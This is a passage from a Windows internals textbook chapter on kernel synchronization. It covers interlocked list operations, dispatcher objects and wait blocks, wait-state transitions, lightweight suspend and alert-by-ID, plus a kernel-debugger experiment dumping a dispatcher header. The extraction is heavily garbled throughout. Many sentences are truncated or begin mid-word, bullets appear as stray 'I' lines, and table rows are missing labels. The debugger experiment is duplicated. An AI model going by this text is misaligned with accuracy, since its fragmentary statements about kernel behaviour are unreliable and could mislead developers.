As the name suggests, this type of lock allows noncontended shared acquisition of a spinlock if no
writer is present. When a writer is interested in the lock, readers must eventually release the lock, and
no further readers will be allowed while the writer is active (nor additional writers). If a driver developer
items, this type of lock can remove contention in the majority of cases, removing the need for the com-
plexity of a queued spinlock.
Executive interlocked operations
The kernel supplies some simple synchronization functions constructed on spinlocks for more
advanced operations, such as adding and removing entries from singly and doubly linked lists.
Examples include ExInterlockedPopEntryList and ExInterlockedPushEntryList for singly linked lists,
and ExInterlockedInsertHeadList and ExInterlockedRemoveHeadList for doubly linked lists. A few
other functions, such as ExInterlockedAddUlong and ExInterlockedAddLargeInteger also exist. All
these functions require a standard spinlock as a parameter and are used throughout the kernel and
Instead of relying on the standard APIs to acquire and release the spinlock parameter, these func-
tions place the code required inline and also use a different ordering scheme. Whereas the Ke spinlock
test-and-set operation to make the acquisition, these routines disable interrupts on the processor and
immediately attempt an atomic test-and-set. If the initial attempt fails, interrupts are enabled again,
and the standard busy waiting algorithm continues until the test-and-set operation returns 0—in which
case the whole function is restarted again. Because of these subtle differences, a spinlock used for the
executive interlocked functions must not be used with the standard kernel APIs discussed previously.
Naturally, noninterlocked list operations must not be mixed with interlocked operations.
Note Certain executive interlocked operations silently ignore the spinlock when possible.
ExInterlockedIncrementLong or ExInterlockedCompareExchange APIs use
the same lock
These functions were useful on older systems (or non-x86 systems) where the lock operation
inlined in favor of the intrinsic functions.
Low-IRQL synchronization
Executive software outside the kernel also needs to synchronize access to global data structures in a
which it accesses as a global data structure, and device drivers need to ensure that they can gain exclu-
sive access to their devices. By calling kernel functions, the executive can create a spinlock, acquire it,
and release it.
178
CHAPTER 8 System mechanisms
waiting for a spinlock literally stalls a processor, spinlocks can be used only under the following strictly
limited circumstances:
I
The protected resource must be accessed quickly and without complicated interactions with
other code.
I
exceptions.
-
tive needs to perform other types of synchronization in addition to mutual exclusion, and it must also
provide synchronization mechanisms to user mode.
There are several additional synchronization mechanisms for use when spinlocks are not suitable:
I
I
I
Pushlocks
I
Executive resources
I
Run-once initialization (InitOnce)
Additionally, user-mode code, which also executes at low IRQL, must be able to have its own locking
I
System calls that refer to kernel dispatcher objects (mutants, semaphores, events, and timers)
I
Condition variables (CondVars)
I
Slim Reader-Writer Locks (SRW Locks)
I
Address-based waiting
I
Run-once initialization (InitOnce)
I
Critical sections
We look at the user-mode primitives and their underlying kernel-mode support later; for now, we
focus on kernel-mode objects. Table 8-26 compares and contrasts the capabilities of these mechanisms
and their interaction with kernel-mode APC delivery.
CHAPTER 8 System mechanisms
179
TABLE 8-26
Exposed for
Use by Device
Drivers
Disables
Normal Kernel-
Mode APCs
Disables Special
Kernel-Mode
APCs
Supports
Recursive
Acquisition
Supports
Shared and
Exclusive
Acquisition
mutexes
Yes
Yes
No
Yes
No
semaphores, events,
timers
Yes
No
No
No
No
Yes
Yes
Yes
No
No
Guarded mutexes
Yes
Yes
Yes
No
No
Pushlocks
Yes
No
No
No
Yes
Executive resources
Yes
No
No
Yes
Yes
Rundown protections
Yes
No
No
Yes
No
Kernel dispatcher objects
The kernel furnishes additional synchronization mechanisms to the executive in the form of kernel
objects, known collectively as dispatcher objects. The Windows API-visible synchronization objects ac-
quire their synchronization capabilities from these kernel dispatcher objects. Each Windows API-visible
object that supports synchronization encapsulates at least one kernel dispatcher object. The execu-
WaitForSingleObject
and WaitForMultipleObjects functions, which the Windows subsystem implements by calling analogous
system services that the Object Manager supplies. A thread in a Windows application can synchronize
with a variety of objects, including a Windows process, thread, event, semaphore, mutex, waitable
the kernel can be waited on. Some of these are proper dispatcher objects, whereas others are larger
chapter in the section “What signals an object?”) shows the proper dispatcher objects, so any other
object that the Windows API allows waiting on probably internally contains one of those primitives.
Two other types of executive synchronization mechanisms worth noting are the executive resource
and the pushlock. These mechanisms provide exclusive access (like a mutex) as well as shared read
they have an API exposed through raw pointers and Ex APIs, and the Object Manager and its handle
system are not involved. The remaining subsections describe the implementation details of waiting for
dispatcher objects.
Waiting for dispatcher objects
NtWaitForXxx class
KeWaitForXxx APIs
deal directly with the dispatcher object.
180
CHAPTER 8 System mechanisms
Because the Nt API communicates with the Object Manager (ObWaitForXxx class of functions), it
goes through the abstractions that were explained in the section on object types earlier in this chapter.
Nt
the information in the object type to redirect the wait to the EventFILE_OBJECT. The Ke
API, on the other hand, only works with true dispatcher objects—that is to say, those that begin with
a DISPATCHER_HEADER structure. Regardless of the approach taken, these calls ultimately cause the
kernel to put the thread in a wait state.
A completely different, and more modern, approach to waiting on dispatcher objects is to rely on
asynchronous waiting. This approach leverages the existing I/O completion port infrastructure to as-
sociate a dispatcher object with the kernel queue backing the I/O completion port, by going through
an intermediate object called a wait completion packet. Thanks to this mechanism, a thread essentially
registers a wait but does not directly block on the dispatcher object and does not enter a wait state.
-
This allows one or more threads to register wait indications on various objects, which a separate thread
CreateThreadPoolWait
and SetThreadPoolWait.
Windows 10, through the DPC Wait Event functionality that is currently reserved for Hyper-V (although
reserved for kernel-mode drivers, in which a deferred procedure call (DPC, explained earlier in this
chapter) can be associated with a dispatcher object, instead of a thread or I/O completion port. Similar
to the mechanism described earlier, the DPC is registered with the object, and when the wait is satis-
KeInsertQueueDpc). When the dispatcher lock is dropped and the IRQL returns below DISPATCH_
LEVEL, the DPC executes on the current processor, which is the driver-supplied callback that can now
react to the signal state of the object.
Irrespective of the waiting mechanism, the synchronization object(s) being waited on can be in one
of two states: signaled state or nonsignaled state
undergoes a state change, from the nonsignaled state to the signaled state (when another thread sets
an event object, for example).
To synchronize with an object, a thread calls one of the wait system services that the Object
Manager supplies, passing a handle to the object it wants to synchronize with. The thread can wait for
signal routines checks to see whether any threads are waiting for the object and not also waiting for
other objects to become signaled. If there are, the kernel releases one or more of the threads from their
waiting state so that they can continue executing.
CHAPTER 8 System mechanisms
181
port, and then calls NtCreateWaitCompletionPacket to create a wait completion packet object and re-
ceive a handle back to it. Then, it calls NtAssociateWaitCompletionPacket, passing in both the handle to
the I/O completion port as well as the handle to the wait completion packet it just created, combined
signaled state, the signal routines realize that no thread is currently waiting on the object, and instead
check whether an I/O completion port has been associated with the wait. If so, it signals the queue ob-
ject associated with the port, which causes any threads currently waiting on it to wake up and consume
the wait completion packet (or, alternatively, the queue simply becomes signaled until a thread comes
in and attempts to wait on it). Alternatively, if no I/O completion port has been associated with the wait,
then a check is made to see whether a DPC is associated instead, in which case it will be queued on the
current processor. This part handles the kernel-only DPC Wait Event mechanism described earlier.
The following example of setting an event illustrates how synchronization interacts with thread
dispatching:
I
I
threads waiting for the event.
I
Another thread sets the event.
I
details on thread scheduling, see Chapter 4 of Part 1.)
Note Some threads might be waiting for more than one object, so they continue waiting,
WaitAny wait, which will wake them up as soon as one object (instead
of all) is signaled.
What signals an object?
during its lifetime and is set to the signaled state by the kernel when the thread terminates. Similarly,
-
trast, the timer object, like an alarm, is set to “go off” at a certain time. When its time expires, the kernel
sets the timer object to the signaled state.
When choosing a synchronization mechanism, a programmer must take into account the rules
object is set to the signaled state varies with the type of object the thread is waiting for, as Table 8-27
illustrates.
182
CHAPTER 8 System mechanisms
TABLE 8-27
Object Type
Set to Signaled State When
Effect on Waiting Threads
Process
Last thread terminates.
All are released.
Thread
Thread terminates.
All are released.
Thread sets the event.
All are released.
Event (synchronization type)
Thread sets the event.
One thread is released and might receive a
boost; the event object is reset.
Gate (locking type)
Thread signals the gate.
a boost.
Gate (signaling type)
Thread signals the type.
Thread sets event with a key.
is of the same process as the signaler is
released.
Semaphore
Semaphore count drops by 1.
One thread is released.
Set time arrives or time interval expires.
All are released.
Timer (synchronization type)
Set time arrives or time interval expires.
One thread is released.
Mutex
Thread releases the mutex.
One thread is released and takes ownership
of the mutex.
Queue
Item is placed on queue.
One thread is released.
When an object is set to the signaled state, waiting threads are generally released from their wait
states immediately.
manual reset event in the Windows API) is used to
announce the occurrence of some event. When the event object is set to the signaled state, all threads
waiting for the event are released. The exception is any thread that is waiting for more than one object
at a time; such a thread might be required to continue waiting until additional objects reach the sig-
naled state.
In contrast to an event object, a mutex object has ownership associated with it (unless it was ac-
quired during a DPC). It is used to gain mutually exclusive access to a resource, and only one thread at
a time can hold the mutex. When the mutex object becomes free, the kernel sets it to the signaled state
and then selects one waiting thread to execute, while also inheriting any priority boost that had been
applied. (See Chapter 4 of Part 1 for more information on priority boosting.) The thread selected by the
kernel acquires the mutex object, and all other threads continue waiting.
A mutex object can also be abandoned, something that occurs when the thread currently owning
it becomes terminated. When a thread terminates, the kernel enumerates all mutexes owned by the
thread and sets them to the abandoned state, which, in terms of signaling logic, is treated as a signaled
state in that ownership of the mutex is transferred to a waiting thread.
CHAPTER 8 System mechanisms
183
information on how to put these objects to use in Windows programs, see the Windows reference
Windows
via C/C++ from Microsoft Press.
Object-less waiting (thread alerts)
condition to occur, and another thread
needs to signal the occurrence of the condition. Although this can be achieved by tying an event to
the condition, this requires resources (memory and handles, to name a couple), and acquisition and
creation of resources can fail while also taking time and being complex. The Windows kernel provides
two mechanisms for synchronization that are not tied to dispatcher objects:
I
Thread alerts
I
Thread alert by ID
alertable sleep by using SleepEx (ultimately
resulting in NtDelayExecutionThread). A kernel thread could also choose to use KeDelayExecutionThread.
We previously explained the concept of alertability earlier in the section on software interrupts and APCs.
side uses the NtAlertThread (or KeAlertThread) API to alert the thread, which causes the sleep to abort,
returning the status code STATUS_ALERTED
thread can choose not to enter an alertable sleep state, but instead, at a later time of its choosing, call the
NtTestAlert (or KeTestAlertThread
by suspending itself instead (NtSuspendThread or KeSuspendThread). In this case, the other side can use
NtAlertResumeThread to both alert the thread and then resume it.
Although this mechanism is elegant and simple, it does suffer from a few issues, beginning with the
fact that there is no way to identify whether the alert was the one related to the wait—in other words,
also alerted the waiting thread, which has no way of distinguishing between
user services can leverage this mechanism, third-party developers are not meant to use alerts. Third,
once a thread becomes alerted, any pending queued APCs also begin executing—such as user-mode
NtAlertThread still requires opening a
handle to the target thread—an operation that technically counts as acquiring a resource, an operation
which can fail. Callers could theoretically open their handles ahead of time, guaranteeing that the alert
will succeed, but that still does add the cost of a handle in the whole mechanism.
To respond to these issues, the Windows kernel received a more modern mechanism start-
ing with Windows 8, which is the alert by ID. Although the system calls behind this mechanism—
NtAlertThreadByThreadId and NtWaitForAlertByThreadId—are not documented, the Win32 user-mode
wait API that we describe later is. These system calls are extremely simple and require zero resources,
184
CHAPTER 8 System mechanisms
using only the Thread ID as input. Of course, since without a handle, this could be a security issue, the
one disadvantage to these APIs is that they can only be used to synchronize with threads within the
current process.
NtWaitForAlertByThreadId API, passing in an optional timeout. This makes the thread enter a real wait,
without alertability being a concern. In fact, in spite of the name, this type of wait is non-alertable, by
design. Next, the other thread calls the NtAlertThreadByThreadId API, which causes the kernel to look
up the Thread ID, make sure it belongs to the calling process, and then check whether the thread is in-
deed blocking on a call to NtWaitForAlertByThreadId
This simple, elegant mechanism is the heart of a number of user-mode synchronization primitives later
in this chapter and can be used to implement anything from barriers to more complex synchronization
methods.
Data structures
Three data structures are key to tracking who is waiting, how they are waiting, what they are waiting for,
and which state the entire wait operation is at. These three structures are the dispatcher header, the wait
block, and the wait status register
KWAIT_
STATUS_REGISTER (and the FlagsKWAIT_STATE enumeration).
The dispatcher header
union
in programming theory. By using the Type
example, a mutex can be Abandoned, but a timer can be Relative. Similarly, a timer can be Inserted
into the timer list, but debugging can only be Active
Signaled state and the Wait List Head for the wait blocks associated with the object.
These wait blocks are what represents that a thread (or, in the case of asynchronous waiting, an I/O
completion port) is tied to an object. Each thread that is in a wait state has an array of up to 64 wait
blocks that represent the object(s) the thread is waiting for (including, potentially, a wait block point-
Alternatively, if the alert-by-ID primitives are used, there is a single block with a special indication that
this is not a dispatcher-based wait. The ObjectHint
NtWaitForAlertByThreadId. This array is maintained for two main purposes:
I
When a thread terminates, all objects that it was waiting on must be dereferenced, and the wait
blocks deleted and disconnected from the object(s).
I
and satisfying the wait), all the other objects it may have been waiting on must be dereferenced
and the wait blocks deleted and disconnected.
CHAPTER 8 System mechanisms
185
each dispatcher object also has a linked list of wait blocks tied to it. This list is kept so that when a dis-
patcher object is signaled, the kernel can quickly determine who is waiting on (or which I/O completion
port is tied to) that object and apply the wait satisfaction logic we explain shortly.
balance set manager thread running on each CPU (see Chapter 5 of Part 1 for
more information about the balance set manager) needs to analyze the time that each thread has
been waiting for (to decide whether to page out the kernel stack), each PRCB has a list of eligible wait-
ing threads that last ran on that processor. This reuses the Ready ListKTHREAD structure
following three conditions:
I
to be time-sensitive and not worth the cost of stack swapping).
I
The thread must have the EnableStackSwap
KeSetKernelStackSwapEnable API).
I
default for a normal thread in the “real-time” process priority class).
-
on, but as we pointed out earlier, for an alert-by-ID wait, there is no object involved, so this represents
the Hint
waiting on the object, it can also point to the queue of an I/O completion port, in the case where a wait
completion packet was associated with the object as part of an asynchronous wait.
wait type and the wait block state, and,
depending on the type, a wait key can also be present. The wait type is very important during wait
wait any, the kernel does not care about the state of any other object because at least one of them (the
current one!) is now signaled. On the other hand, for a wait all, the kernel can only wake the thread if
all the other objects are also in a signaled state at the same time, which requires iterating over the wait
blocks and their associated objects.
Alternatively, a wait dequeue is a specialized case for situations where the dispatcher object is
actually a queue (I/O completion port), and there is a thread waiting on it to have completion pack-
ets available (by calling KeRemoveQueue(Ex) or (Nt)IoRemoveIoCompletion). Wait blocks attached to
is signaled, this allows the correct actions to be taken (keep in mind that a thread could be waiting
on multiple objects, so it could have other wait blocks, in a wait any or wait all state, that must still be
handled regularly).
wait notification, the kernel knows that no thread is associated with the object at all and that
this is an asynchronous wait with an associated I/O completion port whose queue will be signaled.
(Because a queue is itself a dispatcher object, this causes a second order wait satisfaction for the queue
and any threads potentially waiting on it.)
186
CHAPTER 8 System mechanisms
wait DPC, which is the newest wait type introduced, lets the kernel know that there is no
thread nor I/O completion port associated with this wait, but a DPC object instead. In this case, the
immediate execution once the dispatcher lock is dropped.
The wait block also contains a volatile wait block state (KWAIT_BLOCK_STATE-
rent state of this wait block in the transactional wait operation it is currently engaged in. The different
states, their meaning, and their effects in the wait logic code are explained in Table 8-28.
TABLE 8-28 Wait block states
State
Meaning
Effect
WaitBlockActive (4)
This wait block is actively linked to an
object as part of a thread that is in a
wait state.
During wait satisfaction, this wait
block will be unlinked from the wait
block list.
WaitBlockInactive (5)
The thread wait associated with this
timeout has already expired while
setting it up).
During wait satisfaction, this wait
block will not be unlinked from the
wait block list because the wait satis-
faction must have already unlinked it
during its active state.
WaitBlockSuspended (6)
The thread associated with this wait
block is undergoing a lightweight sus-
pend operation.
Essentially treated the same as
WaitBlockActive but only ever used
when resuming a thread. Ignored dur-
ing regular wait satisfaction (should
never be seen, as suspended threads
WaitBlockBypassStart (0)
A signal is being delivered to the
thread while the wait has not yet been
committed.
During wait satisfaction (which would
be immediate, before the thread
enters the true wait state), the wait-
ing thread must synchronize with the
signaler because there is a risk that the
wait object might be on the stack—
marking the wait block as inactive
would cause the waiter to unwind the
stack while the signaler might still be
accessing it.
WaitBlockBypassComplete (1)
The thread wait associated with this
wait block has now been properly
synchronized (the wait satisfaction has
completed), and the bypass scenario is
now completed.
The wait block is now essentially
treated the same as an inactive wait
block (ignored).
WaitBlockSuspendBypassStart (2)
A signal is being delivered to the
thread while the lightweight suspend
has not yet been committed.
The wait block is treated essentially
the same as a WaitBlockBypassStart.
WaitBlockSuspendBypassComplete (3)
The lightweight suspend associated
with this wait block has now been
properly synchronized.
The wait block now behaves like a
WaitBlockSuspended.
dispatcher lock in Windows 7, the overall state of the thread (or any of the objects it is being required
any global state synchronization, there is nothing to stop another thread—executing on a different
logical processor—from signaling one of the objects being waited, or alerting the thread, or even
sending it an APC. As such, the kernel dispatcher keeps track of a couple of additional data points for
CHAPTER 8 System mechanisms
187
KWAIT_STATE, not to
be confused with the wait block state) and any pending state changes that could modify the result
of an ongoing wait operation. These two pieces of data are what make up the wait status register
(KWAIT_STATUS_REGISTER).
When a thread is instructed to wait for a given object (such as due to a WaitForSingleObject
attempts to enter the in-progress wait state (WaitInProgress) by beginning the wait. This operation suc-
ceeds if there are no pending alerts to the thread at the moment (based on the alertability of the wait and
the current processor mode of the wait, which determine whether the alert can preempt the wait). If there
is an alert, the wait is not entered at all, and the caller receives the appropriate status code; otherwise, the
thread now enters the WaitInProgress state, at which point the main thread state is set to Waiting, and the
Once the wait is in progress, the thread can initialize the wait blocks as needed (and mark them
as WaitBlockActive in the process) and then proceed to lock all the objects that are part of this wait.
Because each object has its own lock, it is important that the kernel be able to maintain a consistent
locking ordering scheme when multiple processors might be analyzing a wait chain consisting of many
objects (caused by a WaitForMultipleObjects call). The kernel uses a technique known as address order-
ing to achieve this: because each object has a distinct and static kernel-mode address, the objects can
be ordered in monotonically increasing address order, guaranteeing that locks are always acquired
and released in the same order by all callers. This means that the caller-supplied array of objects will be
duplicated and sorted accordingly.
The next step is to check for immediate satisfaction of the wait, such as when a thread is being told to
wait on a mutex that has already been released or an event that is already signaled. In such cases, the wait
blocks have yet been inserted) and performing a wait exit (processing any pending scheduler operations
marked in the wait status register). If this shortcut fails, the kernel next attempts to check whether the
“timed out,” which results in slightly faster processing of the exit code, albeit with the same result.
the thread now attempts to commit its wait. (Meanwhile, the object lock or locks have been released,
allowing other processors to modify the state of any of the objects that the thread is now supposed to
attempt waiting on.) Assuming a noncontended scenario, where other processors are not interested in
this thread or its wait objects, the wait switches into the committed state as long as there are no pend-
ing changes marked by the wait status register. The commit operation links the waiting thread in the
PRCB list, activates an extra wait queue thread if needed, and inserts the timer associated with the wait
timeout, if any. Because potentially quite a lot of cycles have elapsed by this point, it is again possible
that the timeout has already elapsed. In this scenario, inserting the timer causes immediate signaling of
the thread and thus a wait satisfaction on the timer and the overall timeout of the wait. Otherwise, in
the much more common scenario, the CPU now context-switches away to the next thread that is ready
for execution. (See Chapter 4 of Part 1 for more information on scheduling.)
In highly contended code paths on multiprocessor machines, it is possible and likely that the
thread attempting to commit its wait has experienced a change while its wait was still in progress. One
188
CHAPTER 8 System mechanisms
possible scenario is that one of the objects it was waiting on has just been signaled. As touched upon
earlier, this causes the associated wait block to enter the WaitBlockBypassStart
wait status register now shows the WaitAborted wait state. Another possible scenario is for an alert or
APC to have been issued to the waiting thread, which does not set the WaitAborted state but enables
one of the corresponding bits in the wait status register. Because APCs can break waits (depending on
the type of APC, wait mode, and alertability), the APC is delivered, and the wait is aborted. Other op-
as with the previous cases mentioned.
versions of Windows implemented a lightweight suspend mechanism when SuspendThread and
ResumeThread are used, which no longer always queues an APC that then acquires the suspend event
embedded in the thread object. Instead, if the following conditions are true, an existing wait is instead
converted into a suspend state:
I
KiDisableLightWeightSuspend is 0 (administrators can use the DisableLightWeightSuspend value
optimization).
I
The thread state is Waiting—that is, the thread is already in a wait state.
I
The wait status register is set to WaitCommitted
engaged.
I
The thread is not an UMS primary or scheduled thread (see Chapter 4 of Part 1 for more infor-
mation on User Mode Scheduling) because these require additional logic implemented in the
I
The thread issued a wait while at IRQL 0 (passive level) because waits at APC_LEVEL require
special handling that only the suspend APC can provide.
I
The thread does not have APCs currently disabled, nor is there an APC in progress, because
suspend APC can achieve.
I
The thread is not currently attached to a different process due to a call to KeStackAttachProcess
because this requires special handling just like the preceding bullet.
I
WaitBlockInactive block
state, its wait type must be WaitAll
WaitAny block.
As the preceding list of criteria is hinting, this conversion happens by taking any currently active wait
blocks and converting them to a WaitBlockSuspended state instead. If the wait block is currently point-
no longer wake up this thread). If the thread had a timer associated with it, it is canceled and removed
CHAPTER 8 System mechanisms
189
Because it no longer uses a true wait object, this mechanism required the introduction the three
additional wait block states shown in Table 8-28 as well as four new wait states: WaitSuspendInProgress,
WaitSuspended, WaitResumeInProgress, and WaitResumeAborted. These new states behave in a similar
manner to their regular counterparts but address the same possible race conditions described earlier
during a lightweight suspend operation.
suspend state and essentially undoes the operation, setting the wait register to WaitResumeInProgress.
Each wait block is then enumerated, and for any block in the WaitBlockSuspended state, it is placed in
WaitBlockActive
became signaled in the meantime, in which case it is made WaitBlockInactive instead, just like in a regu-
-
sumes the threads are eligible for stack swapping). In this example, CPU 0 has two waiting (committed)
threads: Thread 1 is waiting for object B, and thread 2 is waiting for objects A and B. If object A is sig-
for execution. On the other hand, if object B is signaled, the kernel can ready thread 1 for execution
other objects but its wait type was a WaitAny, the kernel could still wake it up.)
State
Dispatcher objects
Object A
Wait list head
Object-type-
specific data
Size
Type
State
Object B
Wait list head
Object-type-
specific data
Size
Type
List entry
Thread 2 wait block
Thread 1 wait block
Thread
Object
Next link
Key
Type
List entry
Thread 2 wait block
Thread
Object
Next link
Key
Type
List entry
Wait blocks
Thread
Object
Next link
Key
Type
Thread 1
Wait block list
List entry
Thread 2
Wait block list
List entry
Thread object
PRCB 0
Wait list head
FIGURE 8-39 Wait data structures.
190
CHAPTER 8 System mechanisms
EXPERIMENT: Looking at wait queues
!thread command.
!process command shows that the
thread is waiting for an event object:
lkd> !process 0 4 explorer.exe
THREAD ffff898f2b345080 Cid 27bc.137c Teb: 00000000006ba000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff898f2b64ba60 SynchronizationEvent
You can use the dx command to interpret the dispatcher header of the object like this:
lkd> dx (nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60
(nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60: 0xffff898f2b64ba60 [Type: _DISPATCHER_HEADER*]
[+0x000] Lock
: 393217 [Type: long]
[+0x000] LockNV
: 393217 [Type: long]
[+0x000] Type
: 0x1 [Type: unsigned char]
[+0x001] Signalling
: 0x0 [Type: unsigned char]
[+0x002] Size
: 0x6 [Type: unsigned char]
[+0x003] Reserved1
: 0x0 [Type: unsigned char]
[+0x000] TimerType
: 0x1 [Type: unsigned char]
[+0x001] TimerControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Absolute
: 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] Wake
: 0x0 [Type: unsigned char]
[+0x001 ( 7: 2)] EncodedTolerableDelay : 0x0 [Type: unsigned char]
[+0x002] Hand
: 0x6 [Type: unsigned char]
[+0x003] TimerMiscFlags : 0x0 [Type: unsigned char]
[+0x003 ( 5: 0)] Index
: 0x0 [Type: unsigned char]
[+0x003 ( 6: 6)] Inserted
: 0x0 [Type: unsigned char]
[+0x003 ( 7: 7)] Expired
: 0x0 [Type: unsigned char]
[+0x000] Timer2Type
: 0x1 [Type: unsigned char]
[+0x001] Timer2Flags
: 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Timer2Inserted : 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] Timer2Expiring : 0x0 [Type: unsigned char]
[+0x001 ( 2: 2)] Timer2CancelPending : 0x0 [Type: unsigned char]
[+0x001 ( 3: 3)] Timer2SetPending : 0x0 [Type: unsigned char]
[+0x001 ( 4: 4)] Timer2Running : 0x0 [Type: unsigned char]
[+0x001 ( 5: 5)] Timer2Disabled : 0x0 [Type: unsigned char]
[+0x001 ( 7: 6)] Timer2ReservedFlags : 0x0 [Type: unsigned char]
[+0x002] Timer2ComponentId : 0x6 [Type: unsigned char]
[+0x003] Timer2RelativeId : 0x0 [Type: unsigned char]
[+0x000] QueueType : 0x1 [Type: unsigned char]
[+0x001] QueueControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Abandoned : 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] DisableIncrement : 0x0 [Type: unsigned char]
[+0x001 ( 7: 2)] QueueReservedControlFlags : 0x0 [Type: unsigned char]
[+0x002] QueueSize
: 0x6 [Type: unsigned char]
[+0x003] QueueReserved : 0x0 [Type: unsigned char]
[+0x000] ThreadType
: 0x1 [Type: unsigned char]
[+0x001] ThreadReserved : 0x0 [Type: unsigned char]
[+0x002] ThreadControlFlags : 0x6 [Type: unsigned char]
[+0x002 ( 0: 0)] CycleProfiling : 0x0 [Type: unsigned char]
[+0x002 ( 1: 1)] CounterProfiling : 0x1 [Type: unsigned char]
EXPERIMENT: Looking at wait queues
!thread command.
!process command shows that the
thread is waiting for an event object:
lkd> !process 0 4 explorer.exe
THREAD ffff898f2b345080 Cid 27bc.137c Teb: 00000000006ba000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff898f2b64ba60 SynchronizationEvent
You can use the dx command to interpret the dispatcher header of the object like this:
lkd> dx (nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60
(nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60: 0xffff898f2b64ba60 [Type: _DISPATCHER_HEADER*]
[+0x000] Lock
: 393217 [Type: long]
[+0x000] LockNV
: 393217 [Type: long]
[+0x000] Type
: 0x1 [Type: unsigned char]
[+0x001] Signalling
: 0x0 [Type: unsigned char]
[+0x002] Size
: 0x6 [Type: unsigned char]
[+0x003] Reserved1
: 0x0 [Type: unsigned char]
[+0x000] TimerType
: 0x1 [Type: unsigned char]
[+0x001] TimerControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Absolute
: 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] Wake
: 0x0 [Type: unsigned char]
[+0x001 ( 7: 2)] EncodedTolerableDelay : 0x0 [Type: unsigned char]
[+0x002] Hand
: 0x6 [Type: unsigned char]
[+0x003] TimerMiscFlags : 0x0 [Type: unsigned char]
[+0x003 ( 5: 0)] Index
: 0x0 [Type: unsigned char]
[+0x003 ( 6: 6)] Inserted
: 0x0 [Type: unsigned char]
[+0x003 ( 7: 7)] Expired
: 0x0 [Type: unsigned char]
[+0x000] Timer2Type
: 0x1 [Type: unsigned char]
[+0x001] Timer2Flags
: 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Timer2Inserted : 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] Timer2Expiring : 0x0 [Type: unsigned char]
[+0x001 ( 2: 2)] Timer2CancelPending : 0x0 [Type: unsigned char]
[+0x001 ( 3: 3)] Timer2SetPending : 0x0 [Type: unsigned char]
[+0x001 ( 4: 4)] Timer2Running : 0x0 [Type: unsigned char]
[+0x001 ( 5: 5)] Timer2Disabled : 0x0 [Type: unsigned char]
[+0x001 ( 7: 6)] Timer2ReservedFlags : 0x0 [Type: unsigned char]
[+0x002] Timer2ComponentId : 0x6 [Type: unsigned char]
[+0x003] Timer2RelativeId : 0x0 [Type: unsigned char]
[+0x000] QueueType : 0x1 [Type: unsigned char]
[+0x001] QueueControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Abandoned : 0x0 [Type: unsigned char]
[+0x001 ( 1: 1)] DisableIncrement : 0x0 [Type: unsigned char]
[+0x001 ( 7: 2)] QueueReservedControlFlags : 0x0 [Type: unsigned char]
[+0x002] QueueSize
: 0x6 [Type: unsigned char]
[+0x003] QueueReserved : 0x0 [Type: unsigned char]
[+0x000] ThreadType
: 0x1 [Type: unsigned char]
[+0x001] ThreadReserved : 0x0 [Type: unsigned char]
[+0x002] ThreadControlFlags : 0x6 [Type: unsigned char]
[+0x002 ( 0: 0)] CycleProfiling : 0x0 [Type: unsigned char]
[+0x002 ( 1: 1)] CounterProfiling : 0x1 [Type: unsigned char]
CHAPTER 8 System mechanisms
191
[+0x002 ( 2: 2)] GroupScheduling : 0x1 [Type: unsigned char]
[+0x002 ( 3: 3)] AffinitySet : 0x0 [Type: unsigned char]
[+0x002 ( 4: 4)] Tagged : 0x0 [Type: unsigned char]
[+0x002 ( 5: 5)] EnergyProfiling : 0x0 [Type: unsigned char]
[+0x002 ( 6: 6)] SchedulerAssist : 0x0 [Type: unsigned char]
[+0x002 ( 7: 7)] ThreadReservedControlFlags : 0x0 [Type: unsigned char]
[+0x003] DebugActive
: 0x0 [Type: unsigned char]
[+0x003 ( 0: 0)] ActiveDR7
: 0x0 [Type: unsigned char]
[+0x003 ( 1: 1)] Instrumented : 0x0 [Type: unsigned char]
[+0x003 ( 2: 2)] Minimal
: 0x0 [Type: unsigned char]
[+0x003 ( 5: 3)] Reserved4
: 0x0 [Type: unsigned char]
[+0x003 ( 6: 6)] UmsScheduled : 0x0 [Type: unsigned char]
[+0x003 ( 7: 7)] UmsPrimary
: 0x0 [Type: unsigned char]
[+0x000] MutantType
: 0x1 [Type: unsigned char]
[+0x001] MutantSize
: 0x0 [Type: unsigned char]
[+0x002] DpcActive
: 0x6 [Type: unsigned char]
[+0x003] MutantReserved : 0x0 [Type: unsigned char]
[+0x004] SignalState
: 0 [Type: long]
[+0x008] WaitListHead [Type: _LIST_ENTRY]
[+0x000] Flink
: 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
[+0x008] Blink
: 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
Because this structure is a union, you should ignore any values that do not correspond to the
given object type because they are not relevant to it. Unfortunately, it is not easy to tell which
the objects to which they apply.
TABLE 8-29
Flag
Applies To
Meaning
Type
All dispatcher objects
type of dispatcher object that this is.
Lock
All objects
Used for locking an object during wait operations that need
to modify its state or linkage; actually corresponds to bit 7
(0x80) of the Type
Signaling
Gates
A priority boost should be applied to the woken thread when
the gate is signaled.
Size
Events, Semaphores,
Gates, Processes
Timer2Type
Idle Resilient Timers
Mapping of the Type
Timer2Inserted
Idle Resilient Timers
Set if the timer was inserted into the timer handle table.
Timer2Expiring
Idle Resilient Timers
Set if the timer is undergoing expiration.
Timer2CancelPending
Idle Resilient Timers
Set if the timer is being canceled.
Timer2SetPending
Idle Resilient Timers
Set if the timer is being registered.
Timer2Running
Idle Resilient Timers
Timer2Disabled
Idle Resilient Timers
Set if the timer has been disabled.
[+0x002 ( 2: 2)] GroupScheduling : 0x1 [Type: unsigned char]
[+0x002 ( 3: 3)] AffinitySet : 0x0 [Type: unsigned char]
[+0x002 ( 4: 4)] Tagged : 0x0 [Type: unsigned char]
